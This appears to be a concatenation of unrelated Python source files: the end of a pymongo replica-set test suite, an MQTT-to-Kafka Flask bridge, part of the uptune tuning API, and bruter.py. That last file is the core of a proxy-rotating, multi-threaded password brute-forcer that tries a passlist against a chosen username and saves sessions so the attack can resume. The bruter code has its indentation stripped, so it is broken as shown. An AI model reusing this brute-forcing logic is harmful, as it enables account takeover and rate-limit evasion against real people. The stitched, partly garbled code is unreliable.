                                          "replicaSet=%s" % (port, self.name))
        connection = ReplicaSetConnection("[::1]:%d,localhost:"
                                          "%d" % (port, port),
                                          replicaSet=self.name)
        connection = ReplicaSetConnection("localhost:%d,[::1]:"
                                          "%d" % (port, port),
                                          replicaSet=self.name)

        connection.pymongo_test.test.save({"dummy": u"object"})
        connection.pymongo_test_bernie.test.save({"dummy": u"object"})

        dbs = connection.database_names()
        self.assertTrue("pymongo_test" in dbs)
        self.assertTrue("pymongo_test_bernie" in dbs)
        connection.close()

    def _test_kill_cursor_explicit(self, read_pref):
        c = self._get_connection(read_preference=read_pref)
        db = c.pymongo_test
        db.drop_collection("test")

        test = db.test
        test.insert([{"i": i} for i in range(20)], w=1 + len(c.secondaries))

        # Partially evaluate cursor so it's left alive, then kill it
        cursor = test.find().batch_size(10)
        cursor.next()
        self.assertNotEqual(0, cursor.cursor_id)

        connection_id = cursor._Cursor__connection_id
        writer = c._ReplicaSetConnection__writer
        if read_pref == ReadPreference.PRIMARY:
            msg = "Expected cursor's connection_id to be %s, got %s" % (
                writer, connection_id)
            self.assertEqual(connection_id, writer, msg)
        else:
            self.assertNotEqual(connection_id, writer,
                "Expected cursor's connection_id not to be primary")

        cursor_id = cursor.cursor_id

        # Cursor dead on server - trigger a getMore on the same cursor_id and
        # check that the server returns an error.
        cursor2 = cursor.clone()
        cursor2._Cursor__id = cursor_id

        if (sys.platform.startswith('java') or
            'PyPy' in sys.version):
            # Explicitly kill cursor.
            cursor.close()
        else:
            # Implicitly kill it in CPython.
            del cursor

        self.assertRaises(OperationFailure, lambda: list(cursor2))

    def test_kill_cursor_explicit_primary(self):
        self._test_kill_cursor_explicit(ReadPreference.PRIMARY)

    def test_kill_cursor_explicit_secondary(self):
        self._test_kill_cursor_explicit(ReadPreference.SECONDARY)

    def test_interrupt_signal(self):
        if sys.platform.startswith('java'):
            raise SkipTest("Can't test interrupts in Jython")

        # Test fix for PYTHON-294 -- make sure Connection closes its
        # socket if it gets an interrupt while waiting to recv() from it.
        c = self._get_connection()
        db = c.pymongo_test

        # A $where clause which takes 1.5 sec to execute
        where = delay(1.5)

        # Need exactly 1 document so find() will execute its $where clause once
        db.drop_collection('foo')
        db.foo.insert({'_id': 1}, safe=True)

        old_signal_handler = None
        try:
            # Platform-specific hacks for raising a KeyboardInterrupt on the main
            # thread while find() is in-progress: On Windows, SIGALRM is unavailable
            # so we use second thread. In our Bamboo setup on Linux, the thread
            # technique causes an error in the test at sock.recv():
            # TypeError: 'int' object is not callable
            # We don't know what causes this in Bamboo, so we hack around it.
            if sys.platform == 'win32':
                def interrupter():
                    time.sleep(0.25)

                    # Raises KeyboardInterrupt in the main thread
                    thread.interrupt_main()

                thread.start_new_thread(interrupter, ())
            else:
                # Convert SIGALRM to SIGINT -- it's hard to schedule a SIGINT for one
                # second in the future, but easy to schedule SIGALRM.
                def sigalarm(num, frame):
                    raise KeyboardInterrupt

                old_signal_handler = signal.signal(signal.SIGALRM, sigalarm)
                signal.alarm(1)

            raised = False
            try:
                # Will be interrupted by a KeyboardInterrupt.
                db.foo.find({'$where': where}).next()
            except KeyboardInterrupt:
                raised = True

            # Can't use self.assertRaises() because it doesn't catch system
            # exceptions
            self.assertTrue(raised, "Didn't raise expected ConnectionFailure")

            # Raises AssertionError due to PYTHON-294 -- Mongo's response to the
            # previous find() is still waiting to be read on the socket, so the
            # request id's don't match.
            self.assertEqual(
                {'_id': 1},
                db.foo.find().next()
            )
        finally:
            if old_signal_handler:
                signal.signal(signal.SIGALRM, old_signal_handler)

    def test_auto_start_request(self):
        for bad_horrible_value in (None, 5, 'hi!'):
            self.assertRaises(
                (TypeError, ConfigurationError),
                lambda: self._get_connection(auto_start_request=bad_horrible_value)
            )

        # auto_start_request should default to True
        conn = self._get_connection()
        pools = [mongo.pool for mongo in
                 conn._ReplicaSetConnection__members.values()]
        self.assertTrue(conn.auto_start_request)
        self.assertTrue(conn.in_request())

        # Trigger the RSC to actually start a request
        conn.test.test.find_one()
        for pool in pools:
            self.assertTrue(pool.in_request())

        conn.end_request()
        self.assertFalse(conn.in_request())
        for pool in pools:
            self.assertFalse(pool.in_request())

        conn.start_request()
        self.assertTrue(conn.in_request())
        conn.close()

        conn = self._get_connection(auto_start_request=False)
        self.assertFalse(conn.in_request())
        conn.start_request()
        self.assertTrue(conn.in_request())
        conn.end_request()
        self.assertFalse(conn.in_request())
        conn.close()

    def test_schedule_refresh(self):
        # Monitor thread starts waiting for _refresh_interval, 30 seconds
        conn = self._get_connection()

        # Reconnect if necessary
        conn.pymongo_test.test.find_one()

        # Artificially mark every member down, then ask for a refresh.
        secondaries = conn.secondaries
        for secondary in secondaries:
            conn._ReplicaSetConnection__members[secondary].up = False

        conn._ReplicaSetConnection__members[conn.primary].up = False

        # Wake up monitor thread
        conn._ReplicaSetConnection__schedule_refresh()

        # Refresh interval is 30 seconds; scheduling a refresh tells the
        # monitor thread / greenlet to start a refresh now. We still need to
        # sleep a few seconds for it to complete.
        time.sleep(5)
        for secondary in secondaries:
            self.assertTrue(conn._ReplicaSetConnection__members[secondary].up,
                "ReplicaSetConnection didn't detect secondary is up")

        self.assertTrue(conn._ReplicaSetConnection__members[conn.primary].up,
            "ReplicaSetConnection didn't detect primary is up")

        conn.close()

    def test_pinned_member(self):
        # Huge acceptable latency so every member is a candidate.
        latency = 1000 * 1000
        conn = self._get_connection(
            auto_start_request=False, secondary_acceptable_latency_ms=latency)

        host = read_from_which_host(conn, ReadPreference.SECONDARY)
        self.assertTrue(host in conn.secondaries)

        # No pinning since we're not in a request
        assertReadFromAll(
            self, conn, conn.secondaries,
            ReadPreference.SECONDARY, None, latency)

        assertReadFromAll(
            self, conn, list(conn.secondaries) + [conn.primary],
            ReadPreference.NEAREST, None, latency)

        # Within a request, reads stick to one pinned member.
        conn.start_request()
        host = read_from_which_host(conn, ReadPreference.SECONDARY)
        self.assertTrue(host in conn.secondaries)
        assertReadFrom(self, conn, host, ReadPreference.SECONDARY)

        # Repin
        primary = read_from_which_host(conn, ReadPreference.PRIMARY)
        self.assertEqual(conn.primary, primary)
        assertReadFrom(self, conn, primary, ReadPreference.NEAREST)

        # Repin again
        host = read_from_which_host(conn, ReadPreference.SECONDARY)
        self.assertTrue(host in conn.secondaries)
        assertReadFrom(self, conn, host, ReadPreference.SECONDARY)

        # Unpin
        conn.end_request()
        assertReadFromAll(
            self, conn, list(conn.secondaries) + [conn.primary],
            ReadPreference.NEAREST, None, latency)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
bruter.py | # Date: 12/28/2018
# Author: Mohamed
# Description: Bruter
import queue
import time
import threading
import typing
from lib.browser import Browser
from lib.display import Display
from lib.proxy_manager import ProxyManager
from lib.password_manager import PasswordManager
from lib.const import max_time_to_wait, max_bots_per_proxy
class Bruter(object):
def __init__(self, username: str, threads: int, passlist_path: str):
self.is_alive = True
self.is_found = False
self.password: str = None
self.username: str = username
self.last_password: str = None
self.bots_per_proxy = 0
self.total_threads: int = threads
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.password_manager = PasswordManager(
username, passlist_path, threads, self.display
)
self.browsers: typing.List[Browser] = []
self.active_passwords: typing.List[str] = []
self.unstarted_browsers: typing.List[Browser] = []
# Locks
self.lock_browsers = threading.RLock()
self.lock_unstarted_browsers = threading.RLock()
self.lock_active_passwords = threading.RLock()
self.lock_password_manager = threading.RLock()
def manage_session(self):
if self.password_manager.is_read:
if not self.password_manager.list_size or self.is_found:
self.password_manager.session.delete()
else:
if self.is_found:
self.password_manager.session.delete()
else:
self.password_manager.session.write(
self.password_manager.attempts,
self.password_manager.passlist,
)
def browser_manager(self):
while self.is_alive:
browsers: typing.List[Browser] = []
with self.lock_browsers:
browsers = [br for br in self.browsers]
for browser in browsers:
if not self.is_alive:
break
if (
Display.account_exists == None
and Browser.account_exists != None
):
Display.account_exists = Browser.account_exists
if not browser.is_active:
if browser.is_attempted and not browser.is_locked:
if browser.is_found and not self.is_found:
self.password = browser.password
self.is_found = True
with self.lock_password_manager:
self.password_manager.list_remove(browser.password)
self.remove_browser(browser)
else:
if browser.start_time:
if (
time.time() - browser.start_time
>= max_time_to_wait
):
browser.close()
with self.lock_active_passwords:
try:
self.active_passwords.remove(
browser.password
)
except ValueError:
pass
def prune_browsers(self, browser) -> None:
"""Remove all the browsers with the same password as the given browser"""
with self.lock_browsers:
for br in list(self.browsers):
if br == browser:
continue
if br.password != browser.password:
continue
try:
self.browsers.remove(br)
except ValueError:
pass
br.close()
br.proxy.decr_usage()
self.proxy_manager.dispose(br.proxy)
with self.lock_unstarted_browsers:
for br in list(self.unstarted_browsers):
if br.password == browser.password:
try:
self.unstarted_browsers.remove(br)
except ValueError:
pass
def remove_browser(self, browser: Browser) -> None:
self.proxy_manager.dispose(browser.proxy)
with self.lock_browsers:
try:
self.browsers.remove(browser)
except ValueError:
pass
with self.lock_active_passwords:
try:
self.active_passwords.remove(browser.password)
except ValueError:
pass
if browser.is_attempted:
self.prune_browsers(browser)
def attack(self):
attack_started = False
proxy_per_pwd = 3
while self.is_alive:
for pwd in self.password_manager.passlist:
if not self.is_alive:
break
with self.lock_unstarted_browsers:
if len(self.unstarted_browsers) >= self.total_threads:
break
with self.lock_active_passwords:
if pwd in self.active_passwords:
continue
is_added = False
for _ in range(proxy_per_pwd):
with self.lock_unstarted_browsers:
if len(self.unstarted_browsers) >= self.total_threads:
break
proxy = self.proxy_manager.get_proxy()
if not proxy:
continue
with self.lock_unstarted_browsers:
self.unstarted_browsers.append(
Browser(self.username, pwd, proxy)
)
is_added = True
if not is_added:
break
with self.lock_active_passwords:
self.active_passwords.append(pwd)
if not attack_started:
self.display.info("Starting attack...")
attack_started = True
with self.lock_unstarted_browsers:
for br in list(self.unstarted_browsers):
with self.lock_browsers:
if len(self.browsers) >= self.total_threads:
break
else:
self.browsers.append(br)
self.unstarted_browsers.remove(br)
threading.Thread(target=br.attempt, daemon=True).start()
def start_daemon_threads(self):
attack = threading.Thread(target=self.attack)
browser_manager = threading.Thread(target=self.browser_manager)
password_manager = threading.Thread(target=self.password_manager.start)
attack.daemon = True
browser_manager.daemon = True
password_manager.daemon = True
attack.start()
browser_manager.start()
password_manager.start()
self.display.info("Searching for proxies...")
def stop_daemon_threads(self):
self.password_manager.stop()
    def start(self):
        """Main reporting loop: start the workers, then refresh the stats
        display until the password is found or the passlist is exhausted."""
        self.display.info("Initiating daemon threads...")
        self.start_daemon_threads()
        last_attempt = 0
        while self.is_alive and not self.is_found:
            # Nothing new since the last refresh: back off briefly.
            if (
                last_attempt == self.password_manager.attempts
                and self.password_manager.attempts
            ):
                time.sleep(0.65)
                continue
            browsers = []
            # Snapshot under the lock so the display loop is race-free.
            with self.lock_browsers:
                browsers = [br for br in self.browsers]
            for browser in browsers:
                self.display.stats(
                    browser.password,
                    self.password_manager.attempts,
                    len(self.browsers),
                )
                last_attempt = self.password_manager.attempts
                self.last_password = browser.password
                if not self.is_alive or self.is_found:
                    break
            # Passlist fully read and no work left anywhere: shut down.
            if (
                self.password_manager.is_read
                and not self.password_manager.list_size
                and not len(self.browsers)
            ):
                self.is_alive = False
def stop(self):
self.is_alive = False
self.manage_session()
self.stop_daemon_threads()
self.password_manager.session.is_busy = False |
__init__.py | import ast
import datetime
import json
import time
import threading
import socket
import paho.mqtt.client as mqtt
from flask import Flask
from flask import request
from kafka import KafkaProducer
from message.mqtt_message import MqttMessages
from .healthcheck import HealthCheck
from .actuator import Actuator
from .http_codes import http_response_code
from .setup import args
def on_connect(client, userdata, flags, rc):
    """paho-mqtt connect callback: log that the broker accepted us."""
    message = "connected to mqtt broker"
    print(message)
def on_subscribe(client=None, userdata=None, mid=None, granted_qos=None):
    """paho-mqtt subscribe callback: log the subscription.

    BUGFIX: paho calls on_subscribe with (client, userdata, mid,
    granted_qos); the original took no arguments and would raise TypeError
    if ever registered. Defaults keep zero-argument calls working.
    """
    print('subscribed')
def on_message(client, userdata, message):
    """Fallback paho-mqtt message callback: just log receipt."""
    text = 'messaging'
    print(text)
# give message to kafka as kafka producer
def send_message_to_kafka(msg):
    """Register the reporting node/sensor with the topic manager and
    forward the decoded MQTT payload to the 'sensor-data' Kafka topic."""
    topic_parts = msg.topic.split('/')
    fields = msg.payload.decode().split(',')
    kafka_message = topic_manager.kafka_message(topic_parts, fields)
    node_id = int(topic_parts[1])
    topic_manager.add_node(node_id)
    topic_manager.add_sensor(node_id, int(fields[0]))
    #if topic_manager.sensor_check(topic_parts[1], fields):
    if len(topic_manager.get_nodes()) > 0:
        # Disabled health-check bookkeeping kept for reference:
        # if health_check.get_health_check_mode():
        #     if(health_check.set_node_state(topic_parts[1], True)):
        #         print("health check: ", topic_parts[1], "->True")
        #     else:
        #         print("This node is not healthcheck target: ", topic_parts[1])
        print("data by mqtt: sending message to kafka : %s" % msg)
        print(kafka_message)
        producer.send("sensor-data", kafka_message)
        producer.flush()
def handle_uplink_command(msg):
    """Handle MAC-command uplinks; topic: command/uplink/<MacCommand>/<nodeid>.

    Only DevStatusAns is handled: the node is marked alive with its
    reported battery level.
    """
    parts = msg.topic.split('/')
    if parts[2] != 'DevStatusAns':
        return
    print('Received DevStatusAns!')
    body = json.loads(msg.payload.decode())
    health_check.set_node_state(parts[3], True, body['battery'])
# callbacks
def data_callback(client, userdata, msg):
    """MQTT callback for data/# topics: forward the reading to Kafka."""
    return send_message_to_kafka(msg)
def command_callback(client, userdata, msg):
    """MQTT callback for command/uplink/# topics: handle MAC answers."""
    return handle_uplink_command(msg)
# connecting mqtt client to mqtt broker
def mqtt_run():
    # Wire the callbacks, connect to the broker named by the -b CLI arg on
    # port 1883, start the background network loop, then subscribe to the
    # sensor-data and MAC-command uplink trees.
    client.on_connect = on_connect
    #client.on_message = on_message
    client.on_disconnect = on_disconnect
    client.message_callback_add("data/#", data_callback)
    client.message_callback_add("command/uplink/#", command_callback)
    client.connect(args.b, 1883)
    client.loop_start()
    client.subscribe("data/#")
    client.subscribe("command/uplink/#")
    # NOTE(review): the return value is unused by the module-level caller.
    return http_response_code['success200']
def on_disconnect(client, user_data, rc):
    """paho-mqtt disconnect callback: log and release the client."""
    print("Disconnected")
    client.disconnect()
def health_check_handler():
    """Background loop: while health-check mode is on, connect to the
    health-check server, request node status, wait one interval, then
    upload the collected node states.

    NOTE(review): a fresh socket is opened every cycle and never closed
    (resource leak), and send_req() is handed the global MQTT `client`,
    not the TCP `client_socket` -- confirm both are intentional.
    """
    while(1):
        if health_check.get_health_check_mode():
            healthcheck_server = '10.5.110.11' #'220.70.2.5'
            healthcheck_port = 8085
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            print('Connect to HealthCheck Server...')
            client_socket.connect((healthcheck_server, healthcheck_port))
            print("Connected to HealthCheck...")
            print("healthcheck target: ", topic_manager.get_nodes())
            health_check.setup_target_nodelist(topic_manager.get_nodes())
            # Ask the nodes for DevStatus over MQTT; the answers are
            # recorded by command_callback / handle_uplink_command.
            health_check.send_req(client)
            time.sleep(health_check.get_time())
            print("health_check: Send Json to HealthCheck Server...")
            client_socket.sendall(health_check.create_msg())
# start the node webserver
app = Flask(__name__)
# Kafka producer serializing every payload as UTF-8 JSON; the broker host
# comes from the -k CLI argument.
producer = KafkaProducer(bootstrap_servers=[args.k+':9092'], api_version=(0,10,2,0), value_serializer=lambda v: json.dumps(v).encode('utf-8'))
topic_manager = MqttMessages()
client = mqtt.Client()
app.debug = False
#app.threaded = True
health_check = HealthCheck()
actuator = Actuator()
# Connect/subscribe to the MQTT broker -- note this is a side effect that
# runs at import time.
mqtt_run()
# create socket and run health_check thread
health_check.set_health_check_mode(True)
th = threading.Thread(target=health_check_handler, args=())
th.start()
# setting interval of the health check time
@app.route('/health-check/set_time/<interval>', methods=['GET'])
def health_check_set_time(interval):
    """Set the health-check interval from the URL segment.

    BUGFIX: the route declared a URL variable but the view took no
    parameter, so Flask raised TypeError on every request -- and the body
    then passed the *time module* (not the URL value) to set_time(). The
    variable is renamed <time> -> <interval> so it no longer shadows the
    time module; the URL pattern matches exactly the same requests.
    """
    health_check.set_time(interval)
    return http_response_code['success200']
# interval of the health check time
@app.route('/health-check/time', methods=['GET'])
def health_check_get_time():
    # NOTE(review): the fetched interval is discarded -- the endpoint only
    # returns the generic success code, never the actual value.
    health_check.get_time()
    return http_response_code['success200']
# make the format of the topics from the data which toiot server gave
@app.route('/topics', methods=['POST'])
def response_getMessageFormat():
    """Rebuild the MQTT subscriptions from the JSON posted by the toiot
    server and subscribe to the resulting topic pattern."""
    topic_manager.clear_topics()
    payload = json.loads(request.get_data().decode())
    topic_manager.get_message_format(payload)
    client.subscribe(topic_manager.mqtt_topic)
    print(topic_manager.mqtt_topic)
    return http_response_code['success200']
# delete sensor
@app.route('/sensor/<node>/<sensor>', methods=['GET', 'DELETE'])
def delete_sensor(node, sensor):
    """Unsubscribe the deleted sensor's topic.

    BUGFIX: the route declares both <node> and <sensor>, but the view only
    accepted `sensor`, so Flask raised TypeError on every request. `node`
    is now accepted (currently unused) to match the URL rule.
    """
    client.unsubscribe(topic_manager.get_delete_sensor(sensor))
    return http_response_code['success200']
# delete arduino board
@app.route('/node/<node>', methods=['GET', 'DELETE'])
def delete_node(node):
    """Unsubscribe every topic belonging to the deleted node."""
    node_topic = topic_manager.get_delete_node(node)
    client.unsubscribe(node_topic)
    return http_response_code['success200']
# handle actuator
@app.route('/actuator', methods=['GET', 'POST'])
def actuator_command():
    """Forward the posted JSON command to the actuator over MQTT."""
    command = request.get_json(silent=True)
    actuator.send_req(client, command)
    return http_response_code['success200']
# error handlers
@app.errorhandler(400)
def page_bad_request(error):
    """Map HTTP 400 to the canned bad-request response."""
    response = http_response_code['error400']
    return response
@app.errorhandler(401)
def page_unauthorized(error):
    """Map HTTP 401 to the canned unauthorized response."""
    response = http_response_code['error401']
    return response
@app.errorhandler(403)
def page_forbidden(error):
    """Map HTTP 403 to the canned forbidden response."""
    response = http_response_code['error403']
    return response
@app.errorhandler(404)
def page_not_found(error):
    """Map HTTP 404 to the canned not-found response."""
    response = http_response_code['error404']
    return response
@app.errorhandler(408)
def page_timeout(error):
    """Map HTTP 408 to the canned request-timeout response."""
    response = http_response_code['error408']
    return response
|
api.py | from future.utils import with_metaclass
from multiprocessing.pool import ThreadPool
import datetime
from collections import OrderedDict
import pandas as pd
import numpy as np
import abc, argparse, json, os, ray, logging
import threading, time, subprocess, copy, sys, signal
from uptune.src.template import JinjaParser
from uptune.opentuner.api import TuningRunManager
from uptune.opentuner.measurement import MeasurementInterface
from uptune.opentuner.resultsdb.models import Result
from uptune.opentuner.search.manipulator import ConfigurationManipulator
from uptune.opentuner.search.manipulator import (
IntegerParameter, EnumParameter, PowerOfTwoParameter,
LogIntegerParameter, BooleanParameter, FloatParameter,
PermutationParameter
)
from uptune.plugins.causaldiscovery import notears
from uptune.database.globalmodels import *
# CLI options shared by the tuning entry points (help is disabled so parent
# parsers can embed these arguments without conflicts).
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument('--timeout', type=int, default=72000,
                       help="auto-tuning timeout in seconds")
argparser.add_argument('--runtime-limit', '-rt', type=int, default=7200,
                       help="kill process if runtime exceeds the time in seconds")
argparser.add_argument('--async-interval', '-it', type=int, default=300,
                       help="interval in seconds for async scheduler to check the task queue")
argparser.add_argument('--parallel-factor', '-pf', type=int, default=2,
                       help="number of processes spawned by Parallel Python")
argparser.add_argument('--params', '-params', type=str, default="",
                       help="search space definition in json")
argparser.add_argument('--learning-models', '-lm', action="append", default=[],
                       help="single or ensemble of learning models for space pruning")
argparser.add_argument('--training-data', '-td', type=str, default='',
                       help="path to training data (support csv / txt)")
argparser.add_argument('--offline', action='store_true',
                       help="enable re-training for multi-stage")
argparser.add_argument('--aws', action='store_true', default=False,
                       help="use aws s3 storage for publishing")
argparser.add_argument('--cfg', action='store_true', default=False,
                       help="display configuration on screen")
argparser.add_argument('--gpu-num', type=int, default=0,
                       help="max number of gpu for each task")
argparser.add_argument('--cpu-num', type=int, default=1,
                       help="max number of cpu for each task")
# Module-level logger for the tuning controllers below.
log = logging.getLogger(__name__)
def init(apply_best=False):
    """Reset the uptune env variables: mark UPTUNE active (and optionally
    BEST) unless an EZTUNING run is already in progress."""
    if os.getenv("EZTUNING"):
        return
    os.environ["UPTUNE"] = "True"
    if apply_best:
        # apply best cfg
        os.environ["BEST"] = "True"
# run with the best
def get_best():
    """Return (cfg, result) recorded in ut.temp/best.json.

    Raises AssertionError when no best configuration has been saved yet.
    FIX: removed the redundant fp.close() inside the with-block and fixed
    the 'exsit' typo in the assertion message.
    """
    path = "ut.temp/best.json"
    assert os.path.isfile(path), "best cfg does not exist"
    with open(path, "r") as fp:
        cfg, res = json.load(fp)
    return cfg, res
class ParallelTuning(with_metaclass(abc.ABCMeta, object)):
    """Abstract class for parallel tuning"""
    def __init__(self,
                 cls,
                 args=None,
                 node='localhost',
                 parallel_factor=None):
        # NOTE(review): `node` and `parallel_factor` are accepted but never
        # stored; parallelism is read from args.parallel_factor instead.
        self.cls = cls                        # ray actor class
        self.args = args                      # arguments for control
        self.parallel = args.parallel_factor  # num of parallel instances
        self.search_limit = args.test_limit
        self.best_qors = list()   # best QoR per stage
        self.best_config = None
        # NOTE(review): this string attribute shadows the tempdir() method
        # defined further down -- that method is unreachable on instances.
        self.tempdir = "ut.temp"
        self.history = "../ut.archive.csv"  # archive CSV (relative to workdir)
        self._pending = list()   # pending configs being validated
        self._prev = False       # whether recovering from history
        self._valid = False      # whether pruning is enabled
        self._ratio = 0.3        # pruning score percentage threshold
        self._interval = args.async_interval  # interval for checking the task pool
        self._mapping = dict()   # mapping from Enum to Int
        self._models = list()    # pretrained ML model list
        self._apis = list()
        self._actors = list()
        self._archive = list()
        self._glbsession = list()
def init(self):
path = f"{self.tempdir}/uptune.db"
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
if self.args.database == None:
self.args.database = f"sqlite:///{self.tempdir}/global"
    # Switch to ut.temp workdir and create symbolic links
    def prepare_workdir(self, copy=False):
        """Load the parameter space, build a per-thread work dir with
        symlinks back to the project files, then chdir into ut.temp and
        start ray.

        NOTE(review): the `copy` flag is currently unused.
        """
        with open(self.args.params) as f:
            self.params = json.load(f)
        # If not reusing the parameters JSON
        # from last run, then move the params JSON into workdir
        if os.path.isfile("ut.params.json"):
            os.system("mv ut.*.json ut.temp/")
        # Create symbolic links
        work_dir = os.getenv("UT_WORK_DIR")
        for idx in range(self.parallel):
            thread_dir = f"{self.tempdir}/temp.{idx}"
            os.system(f"mkdir -p {thread_dir} > /dev/null")
            os.chdir(f"{thread_dir}")
            # link every project file except uptune's own ut.* artifacts
            for f in os.listdir(work_dir):
                if not f.startswith("ut."):
                    os.system(f"ln -s {work_dir}/{f} .")
            os.chdir(work_dir)
        os.chdir(self.tempdir)
        # ray.init(redis_address="localhost:6379")
        ray.init(logging_level=logging.FATAL)
def create_tuning(self, index, stage, manipulator):
args = self.args
args.database = "sqlite:///" + os.path.join('uptune.db',
str(index) + \
'-' + str(stage) + '.db')
# keep meas-interface for tuners
interface = MeasurementInterface(args=args,
manipulator=manipulator,
project_name='tuning',
program_name='tuning',
program_version='0.1')
api = TuningRunManager(interface, args)
return api
def global_report(self, stage, epoch, api, node, cfg, requestor, result, flag=False):
if result < self.best_qors[stage] or self.best_qors[stage] == None:
self.best_qors[stage] = result
if stage == 0: # save best cfg
self.best_config = cfg
with open("best.json", "w") as fp:
json.dump([cfg, result], fp)
flag = True
# remove the config from pending list
if requestor != "seed":
assert cfg in self._pending, str(self._pending)
self._pending.remove(cfg)
api.manipulator.normalize(cfg)
hashv = api.manipulator.hash_config(cfg)
g = GlobalResult(epoch = epoch,
node = node,
data = cfg,
hashv = hashv,
time = datetime.datetime.now(),
technique = requestor,
result = result,
was_the_best = flag)
self._glbsession[stage].add(g)
self._glbsession[stage].flush()
self._glbsession[stage].commit()
return g
    def synchronize(self, stage, api, node, epoch):
        """ Synchronize results between different bandits """
        # NOTE(review): this guard is a no-op -- `pass` falls through, so
        # epoch 0 is synchronized anyway; `return` was probably intended.
        if epoch == 0: pass
        # Get the results from the same epoch of other nodes
        q = GlobalResult.extract(self._glbsession[stage], node, epoch)
        api.sync(q)
def create_params(self, stage=0):
manipulator = ConfigurationManipulator()
for item in self.params[stage]:
ptype, pname, prange = item
if ptype == "IntegerParameter":
manipulator.add_parameter(IntegerParameter(pname, prange[0], prange[1]))
elif ptype == "EnumParameter":
manipulator.add_parameter(EnumParameter(pname, prange))
self._mapping[pname] = dict([(y,x) for x,y in enumerate(set(prange))])
elif ptype == "FloatParameter":
manipulator.add_parameter(FloatParameter(pname, prange[0], prange[1]))
elif ptype == "LogIntegerParameter":
manipulator.add_parameter(LogIntegerParameter(pname, prange[0], prange[1]))
elif ptype == "PowerOfTwoParameter":
manipulator.add_parameter(PowerOfTwoParameter(pname, prange[0], prange[1]))
elif ptype == "BooleanParameter":
manipulator.add_parameter(BooleanParameter(pname))
elif ptype == "PermutationParameter":
manipulator.add_parameter(PermutationParameter(pname, prange))
else: assert False, "unrecognized type " + ptype
return manipulator
    def tempdir(self, name):
        # NOTE(review): dead code -- __init__ assigns the string attribute
        # self.tempdir = "ut.temp", which shadows this method on instances.
        self.temp = "ut.temp"
        if not os.path.exists(self.temp):
            os.mkdir(self.temp)
        return os.path.join(self.temp, name)
# Program executor for profiling before tuning
def call_program(self, cmd, limit=None, memory_limit=None):
kwargs = dict()
subenv = os.environ.copy()
subenv["UT_BEFORE_RUN_PROFILE"] = "On"
if limit is float('inf'):
limit = None
if type(cmd) in (str, str):
kwargs['shell'] = True
kwargs['env'] = subenv
killed = False
t0 = time.time()
# save the log for debugging
def target():
out_log = os.path.join(self.tempdir, "ut.profile.log")
err_log = os.path.join(self.tempdir, "ut.profile.err")
file_out = open(out_log, "w")
file_err = open(err_log, "w")
self.process = subprocess.Popen(
cmd, stdout=file_out, stderr=file_err,
preexec_fn=os.setsid,
**kwargs)
self.stdout, self.stderr = self.process.communicate()
thread = threading.Thread(target=target)
thread.start()
thread.join(limit)
if thread.is_alive():
killed = True
# self.process.terminate()
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
self.process.kill()
self.stdout, self.stderr = self.process.communicate()
thread.join()
t1 = time.time()
return {'time': float('inf') if killed else (t1 - t0),
'timeout': killed,
'returncode': self.process.returncode,
'stdout': self.stdout,
'stderr': self.stderr}
    def unique(self, api, stage, desired_result):
        """ Get a unique desired result. report result if duplicates """
        assert desired_result != None, "Invalid Desired Result"
        cfg = desired_result.configuration.data
        hashv = self.hash_cfg(api, desired_result)
        q = GlobalResult.get(self._glbsession[stage], hashv, cfg)
        if q == None:
            # TODO: fix or remove sql-alchemy
            # Check the pandas dataframes
            if os.path.exists(self.history):
                # NOTE(review): `keys` is computed but unused here.
                keys = [ item[1] for item in self.params[0] ]
                df = pd.read_csv(self.history)
                # row-wise AND of per-column equality = duplicate detection
                check = [ df[k]==v for k, v in cfg.items() ]
                dup = check.pop()
                while len(check) > 0:
                    dup &= check.pop()
                if dup.any():
                    # duplicate found in the CSV archive: report a dummy
                    # result so the tuner moves on
                    result = Result(time=1)
                    api.report_result(desired_result, result)
                    return False
            return True
        else:
            # exact duplicate already in the DB: replay its recorded QoR
            result = Result(time=q.result)
            api.report_result(desired_result, result)
            return False
def hash_cfg(self, api, desired_result):
""" Get the hash value of desired_result """
cfg = desired_result.configuration.data
api.manipulator.normalize(cfg)
hashv = api.manipulator.hash_config(cfg)
return hashv
    def training(self, model_list, stage=0):
        """ Initialize ML models with offline data """
        if len(model_list) > 0:
            self._valid = True  # enables model-based pruning in prune()
            # Rebuild the enum -> int mapping (1-based over sorted values).
            # NOTE(review): create_params() builds a different mapping
            # (0-based, unsorted) for the same parameters -- confirm which
            # encoding the models were trained with.
            for item in self.params[stage]:
                ptype, pname, prange = item
                if ptype == "EnumParameter":
                    self._mapping[pname] = dict([(y,x+1) for x,y \
                            in enumerate(sorted(set(prange)))])
            from uptune.plugins import models
            return copy.deepcopy(models.ensemble(model_list, self._mapping))
        return []
    def multivoting(self, stage, desired_result):
        """
        Average predictive scores from self._models and accept a proposal
        when its prediction ranks in the top 30% of the recorded history.
        """
        results = (self._glbsession[stage].query(GlobalResult.result)
                   .order_by(asc(GlobalResult.result)).all())
        if len(results) == 0:
            return True
        # TODO: decide wether multi-stage use multi-voting or not
        # NOTE(review): the unconditional return below makes the scoring
        # code underneath unreachable (kept deliberately, per the TODO).
        return True
        threshold = results[0][0] + self._ratio * (results[-1][0] - results[0][0])
        scores = [model.inference(desired_result.configuration.data)
                  for model in self._models]
        average = sum(scores) / len(scores)
        if average < threshold: return True
        else: return False
    def resume(self):
        """Re-load prior results from the archive CSV into the global DB.

        Returns row-count minus one on success, False when the archive does
        not match this task, or None (implicitly) when no archive exists.
        """
        # Recover the decoded pattern
        if os.path.isfile(self.history):
            print("[ INFO ] Found history records. Trying to re-load the search records...")
            data = pd.read_csv(self.history)
            # Check if the archive is for this tuning task
            cols = [ _[1] for _ in self.params[0] ]
            if not set(cols).issubset(set(data.columns)):
                log.info('archive mismatch. delete archive')
                os.system('rm ' + self.history)
                return False
            # drop the leading id/time column and trailing is_best column
            columns = data.columns[1:-1]
            for col in columns:
                if col in self._mapping:
                    # decode 1-based enum ints back to their original values
                    cands = [item[-1] for item in self.params[0] if item[1] == col][0]
                    mapping = dict([(i+1, cands[i]) for i in range(len(cands))])
                    data[col].replace(mapping, inplace=True)
            def convert(x):
                # best-effort CSV cell -> int / float / perm-list / str
                try: return int(x) if not "." in x else float(x)
                except: # non-numerical values
                    try: # convert a perm list
                        x = x.strip('][').split(', ')
